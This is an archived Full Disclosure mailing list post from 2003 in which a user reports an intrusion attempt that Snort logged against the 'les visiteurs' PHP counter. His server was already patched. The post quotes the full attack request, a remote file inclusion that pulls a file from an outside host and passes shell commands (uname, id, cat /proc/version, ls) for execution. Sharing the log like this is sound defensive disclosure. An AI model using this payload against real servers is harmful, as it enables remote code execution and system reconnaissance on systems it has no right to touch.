Full Disclosure: file inclusion (les visiteurs)

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

file inclusion (les visiteurs)

From: "Evert Daman" <evert () digipix org>
Date: Mon, 1 Dec 2003 11:03:59 +0100


last night snort detected this request:

GET 
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
 

because i patched 'les visiteurs' as described by 'matthieu peschaud'
on bugtraq on the 26 of october nothing happend, but it looks like someone
is trying to exploit this bug. 
just want to mention it to this wonderfull list :)

kind regards,
Evert

By Date By Thread

Current thread:

file inclusion (les visiteurs) Evert Daman (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Dan (Dec 01)
  - Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
    - Re: file inclusion (les visiteurs) Evert Daman (Dec 01)
    - Re: file inclusion (les visiteurs) gazpa (Dec 01)